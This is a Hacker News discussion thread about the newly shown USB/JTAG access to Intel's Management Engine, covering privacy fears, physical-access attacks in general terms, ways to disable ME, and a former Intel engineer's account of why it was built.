The next realization is there is no way to turn them off or remove them. It’s posisble even moving won’t help.
And yet we really don’t seem to care much. Lesser issues generate national outrage and high volumes of press coverage. Why?
HN may be uniquely positioned to show us the answer. Take a community of people with generally above average interest and/or knowledge in this stuff, and the comments are filled with questions asking what the hell ME even is.
Apparently, ME is the perfect combination of opaque, obtuse, and obscure. It’s not rocket science, but complicated enough it’s hard to explain well quickly. It’s easy to be a highly technical person yet never have the need to cross paths with the subject. There has been some press, some activity, but all of that is simultaneously dampened for the same reasons.
I know we're used to "Internet speed" and the tweet happened an entire 24 hours ago, but give it a bit of time before declaring it dead. Wired and Vice need a second to write it up, and see if it hits the mainstream before declaring the issue ignored.
Not saying it will get picked up, though I sure hope it does, but as you point out, it's a bit obscure and takes some explaining.
Still, there are numerous reports that the Facebook app on your phone listens to every word you say to show you ads for things you were talking aboutm but on HN and other web forums, there are always an element of disbelief. We may believe that it must be something else - correlation to web searches from the same IP, but there's never been proof one way or the other. (A Facebook exec's claim doesn't count as proof.)
So there's a section of people that believe they already have high resolution recording devices that we take into to bed. What's one more?
(Typing this, very gratefully, from an ARM Chromebook.)
There are plenty of hot news scare pieces after boring security leaks all the time bringing awareness to issues that technical people have known well. For ex, I'm hearing about friends older parents putting tape over their laptop cameras.
We love to trash bugs that having marketing brands but these exploits, and more importantly obvious attack surfaces like ME or cellphone modems, often just need the right amount of human-interest story, practical real-life example, and wrapped in good news friendly explanation for regular people to care.
It tends to happen a lot more randomly and without a rational order of priority, but it's still happening more and more often. At the end of the day it's always going to come down to the time and effort of a security researcher caring and the tech community putting the effort in to make the journalists care.
Tape over laptop cameras isn't just a "parents-of-friends" thing, it's a good idea. Buy a set of stickers and support the EFF: https://supporters.eff.org/shop/laptop-camera-cover-set
Anyone know somebody at Wired?
Support the EFF! But I hate the stickers.
Everyone puts a sticker on their webcam and completely ignores the hot mic. But you get that false sense of security…
I did not break her phone in that way. Her phone is more dangerous.
Please note that a speaker may also act as a microphone if configured so (at software level). This is especially true for speakers/headphones connected via the jack.
I (personally) think that intelligence/privacy-wise the mic on many devices is a lot more troubling than a camera. Camera is very directional and (again, personally for me) would at most result in embarrassment? While a microphone can record all conversations in a room/appartment, transmit everything with fairly negligible bandwidth, and taping over it won't do much good. You actually need to open the device and disconnect/cut a wire.
Of course a switch would be nice, similar to the older Thinkpads which had a hardware switch for the network devices on the front, originally for use on airplanes.
Any chance you documented the procedure or have links to relevant documentation?
I wouldn't be surprised if the better Dell models have similar documentation available.
*: it's what we did on the One Laptop Per Child laptop, and I'm sure others have too.
Any idea where to get a CLI-from-boot notebook for teaching kids programming and encouraging a hacker ethic?
I think it would be about as easy to make a cardboard one.
The likelihood is that if an attacker has the ability to record audio, they also have the ability to bypass this device.
Not sure why you took that statement as deriding the practice because some older people are doing it? I noted it merely as an indication of how far the behavioural change has spread as a result of news stories... Of course it's good security hygiene. Not an ideal solution though, as others have already mentioned, compared to a hardware switch or built-in cover.
Across the mobile IT we manage, the groups who covered or unplugged their webcams, internal or external, most consistently were middle to older age women, with the least common as women in their 30s or younger. Men covered randomly across all ages, but still less than women. And while they'll cover their laptop camera, most who didn't have a folding case did not also cover their tablet or phone cameras.
I don't know if it's comfort or awareness, but the ones who covered acted like it was common sense, and the ones who didn't hadn't considered it or felt like they weren't likely to be a target of interest. A few women said they chose their laptops because of the physical shutter over the camera.
I don't know if trust in electronics is more generational or age related, but it's definitely a gradient.
I think the threat profile faced by "the rest of us" is probably just a little less intense than someone as well known, wealthy, famous and influential as the CEO of Facebook, but perhaps that's just me.
You're right about this new development of the functional JTAG being very recent and needing time to get around. However, security folks and others have been decrying the potential of the IME backdoor for years.
That they've been largely ignored for years lends some credibility to the thought that "we don't seem to care much." It's hard for most laypeople to understand, and it's difficult to get people excited about something they don't understand (unless they are convinced that they do understand, of course).
How about an official statement from Facebook itself over a year ago? If it was true, people could find out by decompiling the app and make Facebook look absolutely horrible.
That also doesn't count as proof; it carries barely more weight than the Facebook exec's statement.
However, you're quite right about the decompiling argument. And chances are that security researchers have done just that.
The main thing I haven't gotten working yet is the touchpad. For wifi, I'm using an atheros dongle with open firmware.
Doesn't work for every Chromebook, but it does for many. Working fine on my Chrome Box.
> "(Typing this, very gratefully, from an ARM Chromebook.)"
Have you installed a non-stock OS on that Chromebook? Google aren't exactly known for being strong advocates of user privacy.
Imagine, Intel were a Russian company. Tomorrow, there would be a simple and clear [screaming] headline similar to "Russians hacked the election" (general public doesn't need to know or understand how the network, computers or elections actually work). The day after tomorrow it would be illegal to buy anything Intel.
The DREs don't seem to have been a target, though the physical and OPSEC vectors are quite well known at this point.
I'm not commenting on the information operations or the loose and ambiguous langauge that has been used to describe these events.
And the military are also dependent on foreign technology. If not for CPUs inside tanks and planes, then for CPUs inside command center computers. (and not just CPUs)
I do care, a lot. I have decided to avoid Intel (and AMD) hardware like the pest. I will not buy any Core iSpyOnYou or AMD equivalent anymore. I'm an advocate of economic and judicial sanctions from the political level against Intel (and AMD). I tell people around me about the problems and explain how it is an issue of privacy, security, national sovereignty, and market power abuse.
I'm looking for a desktop computer for my day to day use that comes without compromised hardware. The Raspberry Pi 3 works quite well, but doesnt work without non-free software. I successfully installed Debian onto my A20-OLinuXino-MICRO, but the GUI doesn't start. I'm looking for Hardware without Intel Hardware, without non-free software, mainline Linux support and preferable Debian compatible. The OpenPower system by raptor engineering is simply too expensive. I cannot afford it. Any ideas?
Libreboot replaces firmware for some decade-old server machines lacking a ME (although noisy, they work quite well as a desktop).
The amount of money that Intel gets off these chips can't be significant because they are currently over two years old anyways (Q3'15).
That one can maybe fix a hardware backdoor in Intel chips does not make buying them any better. Intel does not get my money but should instead get clear-worded, sanctioned letter from the authorities. I think they should be banned from trading and selling their backdoored stuff. I will not buy even old products of them. They messed up big time and don't even explain themselves.
So you are obviously right that proof of concept of fully FLOSS ARM phone doesn't directly translate to x86.
But it does show that they know how and want to build fully FLOSS systems. Whether they don't quite succeed 100% with the x86 system (as the management engine is still in my computer, albeit isolated and disabled), they have been making great strides in getting close to %100 and I am willing to reward them for that.
Regarding the morality of buying Intel chips, I do share the reluctance to support Intel. I hadn't bought a new Intel computer or CPU since 2007 with Core2Duo for that reason. But sometimes morality decision can't be made in a binary all or nothing manner. In this case I am aware of the damage done by purchasing an x86 system, but it makes up for in being able to have a productive labtop which I can more effectively work to make FLOSS applications with.
Depends on the kind of Mac you buy. I can only comment on their mobile offerings:
- Best supported are the current MacBook Airs. Everything except the Webcam should work out-of-the-box. The webcam needs the out-of-tree bcwc_pcie driver (https://github.com/patjak/bcwc_pcie)).
- The Retina MacBooks need some manual work before being usable (e.g. need to compile out-of-tree keyboard & touchpad driver (https://github.com/cb22/macbook12-spi-driver)), but should work fine as well.
- The MacBook Pros before October 2016 are also quite good supported, the support for newer ones is still quite incomplete (check out https://github.com/Dunedan/mbp-2016-linux for details), although it's possible to use them as daily driver if you're aware of the limitations.
All of the Macs I have require binary firmware blobs for WiFi, for the open source driver to work. And even in that case none of them can do even 802.11n. I have to use the proprietary WiFi driver to get 802.11n or 802.11ac. And yes each model varies in this regard, which makes it something of a Choose Your Own Adventure book.
Not innocuous, but probably less dangerous.
https://news.ycombinator.com/item?id=12584880 and others might have details on WiFi and such
I really wonder why the GPU situation is such a huge mess. Very few are supported by free drivers and the closed drivers are, besides being closed, often of very low quality. Is patent law holding this situation stable? Isn't patent law there to promote advance? I feel it isn't working.
I think it's even more sinister: I would argue that a higher percentage of users on HN might be sworn to secrecy about any knowledge they might have anyway.
So you end up with very smart people who're either sworn to secrecy or who aren't; those who aren't are asking questions (and very few have answers, and those answers are partial or incorrect). Those who are can't answer them honestly or fully.
That is the argument I am asserting is dumb. And it is obviously dumb; in adversarial contests, you don't leave weaknesses exposed just because you might have other weaknesses. It also ignores the presence of differential threats; I may not care about hypothetical compromised NICs because my use case my not require a network, but need anti-evil-maid defenses.
Bottom line: in the context of discussing whether or not the ME is dangerous in the general case, other potential hardware threats are irrelevant, and I believe the argument is one used to intentionally muddy the waters.
 Putting aside deeper strategies; I'm not going to argue about game theory here.
And your (valid) refutation of that part in no way implies spending less time reverse engineering and disabling ME, nor being less excited about this tweet. Correct?
I'm sure that I'm far from the only one.
- create tools to help fight what you deem contrary to things that are important to you
- dispatch leaks in subtitle ways so that humanity is not left in the dark
- lead anonymous and discrete community of people sharing your believes, your skills and passion to improve things
Be careful. And best of luck.
But I haven't seen anything that worried me. Besides those NDAs are legally binding promises, I take those seriously.
"As shown in the presentation by security researchers Maxim Goryachy and Mark Ermolov, one way of accessing the JTAG debugging interface" "is to use a" "hardware implant" "running Godsurge" "which can exploit the JTAG debugging interface. Originally used by the National Security Agency -- and exposed by Edward Snowden -- Godsurge is malware engineered to hook into a PC’s boot loader to monitor activity. It was originally meant to live on the motherboard and remain completely undetectable outside a forensic investigation."
But this all was in January:
"The claim was made during a presentation" "which showed how hackers could use a cheap device to gain access to a debugging interface embedded in hardware."
What's the news now compared to then?
It is not just a matter of apathy. They get violently ill at being told to think about protecting themselves. If you tell them not to put their debit card into an ATM without giving the card reader a tug to see if its real first for example, they'll do it wrong anyway just to spite you. It isn't that giving the tug is hard or that it isn't wise, but they simply do not want you to be right or have to think about it.
Admitting that you are right about that one little thing means they have to deal with all the other issues that you brought up as well. There is probably an interesting field of psychology to be researched with just that phenomena alone. I don't think this is just the people I know personally because I've encountered a lot the public who has this mindset as well. It is how we got ourselves into these problems in the first place with no recourse.
I stopped sending the emails about a year ago because they asked me to. The reason stated is that no one cares about security and a number of them had already auto-forwarded me to the junk folder. Or, told me they saw my name and would skip my emails and not open them. I don't even feel like bringing it up again now that it is a going concern. They will continue to not care.
I find it frustrating.
EDIT: I've disabled Intel ME on my machines. I would offer to do it for others but they'd have to acknowledge it's something that concerns them to want that help, and they won't.
Not really how I think of it. Seems more similar to waking up one day and realizing Tesla controls your Tesla car remotely. Or Microsoft can push bad updates Windows. Or Google can push bad updates to Chrome.
> And yet we really don’t seem to care much. Lesser issues generate national outrage and high volumes of press coverage. Why?
On my end it's because I have not seen a single shred of evidence that it has been used for spying, and because I figure the moment anyone becomes aware of that happening, people would probably find a way to block the network traffic at the router or somewhere else.
Now I can't wait for rogue monero miners to use ME to propagate :)
- If it were to periodically "check in" with an external server to see if it needs to do any kind of spying -- admins would notice the network traffic.
- If it needed to be contacted externally to "initiate" any kind of spying at all, that would mean anyone behind a NAT would be safe, and furthermore, the the moment anybody notices such a thing, it would make the headlines and get blocked on networks, so this capability would need to be kept secret and turned off except for ultra-high-value targets... which most people do not view themselves as.
The NSA routinely intercepted Google internal traffic. Did Google, who are presumably running the most advanced network on the planet and staffed by people who don't suck, notice the intrusion? They did not; they got informed via PowerPoint.
While the sophistication of the attackers decreases as you move from NSA to random hackers, so does the sophistication of the network as you move from Google to mid-sized businesses.
How are these even similar? Did the NSA ever send traffic of their own on the Google network infrastructure? Citation needed if so, because I recall they merely listened in on existing traffic using external network equipment.
Not at all.
When you have something that good, you use it for specific targeting. You get a guy with a work laptop at home, you infect him, then you use the machine to get one closer to your objective. Slowly. With time between the events. Without being a beacon in the network.
Or you just use it to spy on a guy you suspect.
Or to get access to secrets of somebody you wanna black mail.
Did you even read what I wrote? Specifically the last sentence?
Admins would use network dedicated hardware with network chipsets driven by closed source firmware.
In a crazy but technically doable scenario, that closed source firmware could contain instructions to "send packets containing magic word X to address a.b.c.d" and not reporting or counting that traffic, even to applications opening the device in promiscuous mode, with all routers in between to obey the same instructions. Not a single byte would be reported, counted or sniffed unless someone sticks a digital analyzer on the network cable.
No, I fully expect there are enough admins out there running dedicated hardware whose design & source code they have access to. That is sufficient.
Similarly inbound control signals could be delivered by modifying inbound traffic that the ME observed and decided.
Depending on your throughput needs the signal could be delivered subtly by for example modifying the timing between packets in a way that would be very hard to identify as a signal.
I’m hoping the ME firmware Now gets dumped and studied closely. I’m betting there are some surprises in there
Until there is evidence, this is technically just a government conspiracy theory.
The way I see it is Intel ME is a processor-level application that has full control of all computer activity and cannot be blocked or disabled and can be accessed and controlled remotely.
Would like to hear other people's opinions of what it is.
So, the three O's is a good conceptual utility, for understanding the combination of traits that can exploit the realities of human psychology, and explain why no one seems to care about how technical paralysis can stifle apparent relevance.
It's not only a means of explaining sneaky cloak and dagger stuff. You could describe lots of niche tech staples with this mnemonic.
When something is difficult to explain, that's often enough to derail any casual conversation with simple mental fatigue.
EG tool: https://github.com/corna/me_cleaner
It's that even those of us that care vehemently, have no recourse. It is impossible to fight a secret police state.
Part of winning is to even begin to believe you can fight...
RISC-V  is an open ISA that looks promising. Unfortunately, the privileged instruction set is still a draft, which is important for getting a full modern OS up and running.
lowRISC  is as non-profit open hardware company that has been working on a fully open RISC-V-based SoC that can run Linux. In their about page they claim it'll be ready this year.
There's also the stuff from SiFive. They have an arduino-comparible microcontroller, and have ongoing work for a 64-bit quad-core. I don't think their hardware is open, though.
Commercially there's no alternative. Enterprises even use Microsoft over Linux/BSD. Why would they get rid of Intel?
For Anti-US spying a firewall should be enough.
I think I am a bit out of the current state of events. Is ME short for management engine? If that is the case, what is the problem with it?
Most people do not have any concrete notion about what management engines are. People weren't that skeeved out by Alexa, and that was a pretty easy-to-understand system. There's no way that people will have any kind of personal connection to something that they barely are aware of and don't understand.
Sure, if by one day you mean - for the past 10 years? And if by spy cams you mean - A product with official documentation from the vendor, and similar to other products from other vendors. And these products can be purchased by anyone.
You have some valid points, but they are clouded by your sweeping generalizations and needlessly polarizing language.
We've now entered a realm where an attacker could simply plug a device on an usb port of your computer for a few seconds to have it access your cpu's ME through USB JTAG and take over it, allowing him to have full access and control over what you do/read/open/type over the network, without you ever knowing it since you can't see it.
And the only way to get rid of it for sure would be to pretty much throw that cpu away and buy a new one.
Or am I being overly paranoid and there is something I haven't considered that makes this scenario impossible ?
EDIT: given the answers I think my main concern wasn't well expressed above. I'm not saying this as in "ME is making it easier to be compromised". That may or may not be true, but that's not my point.
My point is, we all know that once compromised, you can't clean it and need to burn it all and start from scratch: recover from backup (not files on the compromised machine), format everything, reinstall.
Due to the nature of the ME, this is not a solution here. The cleanup needs to be done at the hardware level. Unless I misunderstood something, once it happens, your cpu is done for, period.
And 'using a hack to cleanup the hack' is still in the realm of cleaning up rather than start from scratch, it's not a solution for the same reason than cleaning up your comprised linux box is not one and you need to start from scratch.
The concern with the Intel ME is that it has a native network adapter. You can bet efforts are currently underway to discover how to exploit the ME remotely. THAT'S when things get scary.
Your paranoia is not unjustified. Personally, I am nervous that some of my systems have the ME. When attention turned to it about a year ago, i knew it would only be a matter of time before someone broke into it.
Yep, this is the big deal. After I "discovered" the ME, my first stop on my home network was the switch, to block all that crap. (And I found my storage server, equipped with a Supermicro all-in-one motherboard, helpfully grabbed an IP for the ME to listen on with an 'admin/admin' password.)
I just wish the empire builders at the NSA would care about something other than their own little power center. They knew this would happen - it always does. The NSA is probably the biggest security threat to the U.S. people at this point, because they keep building concentrated, high-value targets and then lose control of them.
 Not to be confused with 'U.S. government interests'.
This is a useful document for understanding what exactly you're dealing with and what to do about it:
BMC doesn't always use a dedicated physical port, and it's commonly bridged in sideband to the other NICs on a server.
IOMMU effectively solves the "DMA is completely broken" problem, as far as I'm aware.
Evil Maid attacks are mostly worrisome because even UEFI cannot protect you against some bootloader attacks (what if you disable UEFI or reflash the firmware and then have a bootloader that just looks like a UEFI boot). There are some usages of TPMs that seem quite promising (they revolve around doing a reverse-TOTP-style verification of your laptop to ensure that the TPM has certified the entire boot chain).
It's quite a hard problem, made significantly harder by the fact that every fucking hardware vendor seems to want to make our machines even less secure.
Through this attack, they could compromise the ME longterm, which means the long accepted "nuke it from orbit" solution to security breach (unplug everything, format everything, start from scratch) still wouldn't be enough; that entire chip is done for. And 'using a hack to cleanup the hack' is still in the realm of cleaning up rather than start from scratch, it's not a solution for the same reason than cleaning up your comprised linux box is not one and you need to start from scratch.
A couple of years back, and being absolutely horrified at the remote management available on my second-hand lenovo t420s - including management over wlan.
Sure the features are gated by price/cpu "brand" - but I think it's safe to assume a) this is complex software and will have bugs with security implications b) once it's well enough understood - it seems likely it can be "upgraded" (similar to how you today can eg: replace the bios with coreboot).
The conclusion is that we need new platforms - perhaps power5 will help.
If the attack can he pulled off with only one time access, it’s worse than an evil maid attack.
I can't help but to think of all those exploits that target anti-virus software.
When you think about it, "it seemed like a good idea at the time" can explain most tragedies in human histories.
So if mass disruption of the very system that support your life can have supporters among a community composed of smart and actively debating people, "it seemed like a good idea at the time" probably happens every week at gov agencies.
What leads to failures, and I suspect happened at Intel, was that they mistook a very localized consensus for a broader one. There's a word for this, it's called "groupthink". A group of people can talk themselves into doing something very stupid (or evil) while still thinking they're doing the right thing, given enough time and motivation.
There was no widespread consensus, outside of Intel, that the IME was a good idea. If they had solicited opinions from outside their organization, they would doubtless have gotten horrified reactions. But they didn't, or if they did they must have dismissed those concerns, because they went through with the bad idea anyway.
The apparent secrecy with which they developed the IME is also a cause for alarm; groups of people who operate in isolation are particularly prone to groupthink, and so even if their motivations are good ones, the fact that they are working without continuous feedback from anyone on the outside raises the chances of a perverse outcome.
At least now that everyone can see the problem people can make informed decisions.
- felt guilty about it and decided to make amend
My money is that exploits have been on the blacks market for a while now. We just have an official public demo now.
Rule of thumb: when something that catastrophic is made public, the worst already happened and you are late to the party.
In white hats we trust :)
In tin-foil hats, we trust, more like!
In Faraday cages we trust.
But yes, I hope that with this it'll be possible to completely remove the remaining few hundred kB of Intel ME code remaining.
of course it is, because the USB DCI attack is one level below the Intel ME. Even if it is deactivated via HAP, which basically simply puts the ME code into an infinite loop or a CPU halt state - both can be reversed by JTAG.
If they have full debugger access to what's running in Intel ME then removing the code from the firmware probably doesn't make a difference (assuming they can run un-trusted code in that context). If they cannot write their own code and so an attack requires ROP gadgets then removing the code might make it harder (or impossible) to do, but I doubt it.
Huge corporations backed up by gov agencies with a lot of time, money and skilled people VS a few people working for free because they believe they should. Not a fair fight.
I thought this behavior disappeared ~10 years ago.
However there are bugs in USB stacks, especially now you can do so many alternate protocols over USB-C.
There's nothing fundamental in the USB spec that lets devices execute code on the host.
I know some of you might argue that even generic USB sticks can do damage and, whilst I agree, this attack is still a degree worse than most of those.
Thus far the most damage an unknown USB stick could do was type commands as a fake keyboard (visible to user) or exploit a driver vulnerability to silently cause mischief.
Correct me if I'm wrong, but those cases could still be trivially stopped by a security policy set by administrators disallowing unknown USB devices. (Of course, how many places would use this is another matter, but it's still very important for places where this does matter.)
This attack on the other hand would seem to be able to completely bypass your operating systems restrictions on USB ports.
Why? Security knows there are always bugs in software, and assumes they exist. Thanks to @h0t_max, the rest of us know this particular bug exists, but this bug has been around for a while - who's to say evil hax0rs didn't find this bug years ago and have been exploiting it since?
Or put another way - you say an unknown USB stick could exploit a driver vulnerability to silently cause mischief, and then claim that this is easily stopped if an administrator sets a security policy to disallow unknown USB devices. (I assume you mean a Windows GPO enforced policy or similar, and not a written social policy.) Who's to say the code that enforces the policy doesn't have bugs that's exploitable? What if the driver for a known USB stick has exploits?
Physical access is physical access, and while there are mitigations for the evil maid attack (like an encrypted drive and shutting down -not just suspending, when the machine is out of sight), there simply is no way around the fact that physical access is game over.
That mitigation is useless against Evil Maid. There are much more sophisticated mitigations (using a TPM to measure the boot, and then do something akin to TOTP in order to allow the user to actually verify the state of the machine) which actually could protect against Evil Maid almost completely (assuming you don't have something like Intel ME that cannot be verified by the TPM).
"Once you have physical access it's game over" is a very common response to these discussions, and I find it incredibly defeatist. Of course physical access means that the "clock is ticking" until your data is compromised, but sufficient protections can dampen the impact or increase the difficulty.
For example: IOMMU protects against DMA-based attacks, something that was impossible to protect against several years ago. This doesn't mean that someone cannot launch other attacks, but it does mean that the trivial "just plug anything into a USB port and you have DMA" attack is no longer possible.
Encrypted drive + shutdown is a defense against a specific Evil Maid attack, cold boot attacks. It is not a very expensive attack to run; for the cost of a can of compressed air, and a USB drive, anybody sophisticated can run this attack. https://en.wikipedia.org/wiki/Cold_boot_attack
Sorry to sound defeatist, but if you had been relying on IOMMU to save you, the trivial "plug anything into a USB port and you have CPU JTAG access" attack has always been possible. (Never mind that IOMMU implementations aren't guaranteed to be bug free.)
In the face of that, what do you do?
With this knowledge, all I really can do is stay up to date and patch-patch-patch. Have a travel Chromebook for leaving in hotel rooms, but ultimately I just have to know that it's not enough, especially against a CIA-grade Evil Maid, or an Evil Maid that's able to factor 4096-bit prime numbers. (That last one's not theoretical, either. It was revealed a few weeks ago that TPMs in Chromebooks and other hardware was generating weak keys, leading to cloud-factorable 4096-bit RSA keys.)
A less-sophisticated Evil Maid can still physically steal my laptop for pawning, and even if they can't get my data, I've still had my laptop stolen. Not-being-defeatist, I backup my data, although that has a totally different set of security concerns over the Internet.
Access to a USB port is not physical access. USB is a network interface that is commonly used to connect host computers to small portable embedded systems, often tiny NAS units of other people also known as USB flash drives.
This interpretation of "you're being overly paranoid" is new to me ;)
Can you not see the difference between an attacker opening the case and stealing your HD, vs inserting USB key for a few seconds, then going away, and exploiting later at their leisure?
Software do-over is a very well accepted solution (don't bother cleaning the rootkit, just format reinstall), but hardware do-over (change the cpu) is going to be a hard pill to swallow.
Intel ME and the (assumed ) partnership with CIA to design and build this system - should be an absolute travesty blow to the integrity of their business long-term. Will you, as lead engineer or sys admin for your mission critical business now continue to choose Intel products to help build your infrastructure?
Unfortunately it seems that our modern market has not yet evolved enough to punish companies involved in such reckless behavior. I suspect the reason is primarily the ease of which governments can mass tax and create fiat currency. Perhaps there is some alternate decentarlized currency system that would limit government's ability to tax, print and award juicy big-brother contracts to these companies.
Anyway, for now at best - and perhaps somewhat encouraging - is the subsequent brain drain of engineers and hackers alike who want nothing to do with faceless corporations like Intel, Google, Facebook, IBM, et all who routinely deceive/exploit and work against the best interest of their own customers.
I worked at Intel on ME and the things that came before it until around 2013. I can tell you two things --
1. No, Intel ME wasn't born out of a desire to spy on people nor was it -- to the best of my knowledge but I honestly believe I would know -- created at the request of the US government (or others). It was an honest attempt at providing a functionality that we believed was useful for sysadmins. If it was something done for the CIA, I believe it would probably have been kept secret instead of marketed.
2. It was initially going to be much "worse". Early pilots with actual customers -- such as a large british bank -- were going to run a lot more stuff -- think a full JVM -- and have a lot more direct access to the user land.) Security concerns scrapped those ideas pretty early on though.
In retrospect, I personally believe the whole thing was a bad idea and everybody is free to crap on Intel for it. But the thing was never intended as a backdoor or anything like that.
1. Why did your team deem it necessary to deny the end-user the capability to disable this feature?
2. Why did your team decide to enable ME on ALL consumer grade chips? You could have only enabled it on, say, Xeon, as a value-add - exactly like you do for ECC support. You could have made more money this way. But . . . you didn't.
Without legitimate, sensical answers to the above questions, there is no reason for anyone to believe your team did anything other than design a backdoor for the Feds. Sorry.
The same techniques for managing server farms are useful for managing hundreds/thousands of corporate desktops. Being able to power up a desktop (“lights out” management) and re-image it at 3:00AM is very useful for example. You could also install 3rd party security products to the ME to provide higher level threat detection that’s hard for a rootkit to hide from. So once the work of getting an integrated management engine production ready was complete, it made perfect sense to use it in corporate desktops. It’s expensive to produce chip variants, so doubtless that further cost pressures on Intel lead to them putting the ME their core shared across all products. Plus, now IT admins can let the VP of Sales get the laptop she wants knowing they can leverage their System Center/OpenDesk/etc. console to manage it via ME.
So no, they aren’t a Fed backdoor. Those of us who worked in IT 10 years ago remember how the market drove Intel to add the ME. That is doubtless why many are silently conflicted. They don’t want to take a big step back. They likely are expecting/hoping Intel will “fix” the problem.
Even Raptor's high-security Talos II has a BMC; the issue isn't having a BMC, the issue is that it's not owner controlled and it's not auditable.
What's wrong with the ME is that
a) it only accepts Intel-signed code; I can't replace the ME firmware with an implementation (e.g. of remote management functionality) that I trust. I also can't repair vulnerabilities in it without the cooperation of both Intel and the vendor (which is often not forthcoming).
Consider the Authorization header bug in the ME's webserver and multiply it by how many machines you claim use this remote management functionality. That's horrifying.
b) it has DMA access to main memory, which is insane.
Look at the fact that every server nowadays has a BMC, in addition to the ME. On a client device the ME would be used to implement similar functionality, so the BMC is actually a wasteful duplication - but server vendors have to use a BMC because they can't program the ME to implement the remote management functionality they need, because only Intel can program the ME. This is stupid.
Would it be possible in future CPU designs to put a jumper in, e.g., the ME power path? Closed by default (and possibly forced closed in enterprise-targeted devices), but the option exists to disable the ME without requiring an additional CPU variant.
Back when ME’s were discrete, you would inevitably have some with, some without. Someone would order a bunch of machines without them to “save money” or they bought a model that just didn’t have an ME add on offered by the OEM.
That meant that occasionally you had to actually have the machine in your presence to service it. You end up designing two processes/procedures based on whether you are remote or not. Lack of ME’s actually increased labor costs by reducing the number of machines a tech could manage (on average).
Having an CPU fuse essentially winds the clock back to the discrete ME days. Someone will place an order order for SKU ENCH-81-U instead of EMCH-81-U and you end up with 500 machines with the ME fuse blown. Inevitably there will be a big enough restock fee that someone in accounting will say “just use them.”
(The same applies to things like having/not having a TPM module, etc.)
It would have made much more sense to require you to enable it before first use, and ship it as disabled from the factory. Enablement should work like blowing an eFuse where it's never off once it's turned on, but if you never turn it on it doesn't exist. Then I don't have to worry about the feature unless I know exactly what it is and how to use it.
Older products had jumpers, physical switches, or software mechanisms for securely updating firmware. The first two are immune to most types of remote attacks if done in hardware. Intel already uses signed updates for microcode which people aren't compromising remotely left and right. Intel supporting a mechanism like those that already existed in the market for disabling the backdoor would not give widespread, remote access to systems. If anything, it would block it by having less privileged, 0-day-ridden software running.
I'll also note that the non-Intel market, from OpenPOWER to embedded, has options ranging from open firmware (incl Open Firmware itself) to physical mechanisms to 3rd-party-software. Intel is ignoring those on purpose for reasons they aren't disclosing to the users that also probably don't benefit them.
Can you please provide a reference? I've been trying to enable ME forever for my consumer-grade i7 with Intel motherboard for remote management, and I can't seem to be able to.
FOR OTHERS: Note that you might be able to disable ME's remote access simply by ordering a computer with "No VPro".
1. ME is a platform with many applications that run on it; AMT (Active Management Technology) is one of them.
2. AMT has many components; remote management is one of them.
3. AMT comes in multiple 'editions' (my word, not Intel's) with different features. The Small Business Technology (SBT) edition does not provide remote access by design, with the idea (AFAICT) that small businesses don't want to setup and manage management servers and therefore remote access is insecure.
4. If in MEBx, you see "Small Business Technology", then there's no remote management - unless there's another remote management function in ME that is independent of AMT. Also, the first reference below provides the official method of identifying SBT implementations (via a flag in some table). I discovered it on a system ordered with a "No VPro" network card (I'm still not sure why that's a spec of the NIC and not the processor).
Here are a couple of useful references:
* SBT: https://software.intel.com/en-us/documentation/amt-reference...
* MEBx on i7 processors (the title also specifies a chipset; I'm not sure how much that matters): http://download.intel.com/support/motherboards/desktop/sb/in...
 MEBx is Management Engine BIOS Extension: the text-mode, pre-OS console UI for configuring ME
 VPro is not a product or technology. It's merely branding for, AFAICT, an ambiguously defined group of products that IT professionals might be interested in. It includes AMT (which is also part of ME and often marketed independently), TXT (Trusted Execution Technology), and more.
to the best of my knowledge but I honestly believe I would know
Who would the first people be then?
To your points though, I mean it is a great perspective and helps to illustrate a sliver of possibility of innocence here on Intel's part but it's a little weak given that the operation would have been compartmentalized and political objectives/partnerships therof obviously not part of the system's technical development.
Why not? Is a salary a good ethical justification for mistreating other people?
Do you remember the plain text password leaks from Yahoo?
In the real world nothing has to be true/good/secure. All it has to be is that users should be felt so, doesn't matter what the reality is.
As long as the focus is on earning more money/power/control, this is always going to happen.
Most businesses probaby WANT the feature. See other comments in this discussion about lights-out management.
I’m guessing t wouldn’t be economically worth it.
However, I believe I would know because it's not like one day the CEO came to us with a folder filled with requirements to be implemented. This is something that started very small ("find a way to force reboot a PC remotely if it's non-responsive") and evolved from there over months/years. I endured way too many meetings were design decisions were made. Unless there were secret CIA agents disguised as my colleagues, I really believe it was designed by Intel engineers all the way through.
I have no issues with people criticizing the product for its failures. I agree with them. But every time I see someone claiming this was a CIA thing, it actually hits me personally.
Then again, I'll never be able to convince anyone of anything. I just felt like saying something this time.
I guess I'm having a bad morning :)
Also, I think people here severely underestimate the red tape and huge efforts needed to implement something mildly complex, Intel scale. Developing ME under wraps with full CIA-like functionality is staggeringly difficult - I've seen the effort needed getting the BIOS to work on the prototype boards without crashing or destroying the HW; pulling ME to work reliably on all boards would be one order of magnitude harder; making it spy CIA-style - add two more orders of magnitude. I think people don't really understand how difficult is to get something that close to the metal work reliably; able to poke inside the memory of a running OS - forget about it.
Also, I think the readers of HN severely overestimate the effort CIA needs to spy on the internet users - why even try to bug the firmware when people actively share their privacy via apps that they themselves install???
Complete aside, but the whole story of Frankenstein is about how Dr. Frankenstein is repulsed by his actions the moment that he brings the monster to life. So he most certainly wasn't "proud" of his actions, he was horrified by them. But I agree that this is likely how some of the engineers who worked on Intel ME would feel too.
> why even try to bug the firmware when people actively share their privacy via apps that they themselves install???
We know (thanks to Snowden and WikiLeaks) that the NSA and CIA have programs like this, so it's actually more incredible that you don't believe that the CIA or NSA would invest resources in adding backdoors to things like Intel ME. I don't buy that they designed it, but given that we know they intentionally sabotage internet standards it's very likely they sabotaged it in some manner. Or at the very least they have security vulnerabilities they are not disclosing, so they can exploit them.
In the end, yes. But the novel starts with him being so proud of the golem that he takes it home with disastrous results. Hmmm, maybe the comparison to ME isn't that far-fetched.
> I don't buy that they designed it
Yep, this is what I'm saying - it's unlikely that they ever told Intel "put this in there".
> it's very likely they sabotaged it in some manner. Or at the very least they have security vulnerabilities they are not disclosing
Absolutely, yes. They would be vastly incompetent not to have them, in fact. What I don't agree about with HN crowd is the threat profile of such an exploit.
I have trouble believing that they use them on a mass-scale. There are so many people looking at the ME, that using any exploit on a massive scale would disclose it almost immediately, and allow the 'enemy' to develop protections. Given the extraordinary capabilities of such an exploit giving it a very valuable status, they probably need to protect it, and will use it only when absolutely necessary; such as the vast, vast majority of the HN users would not ever be subjected to such an exploit.
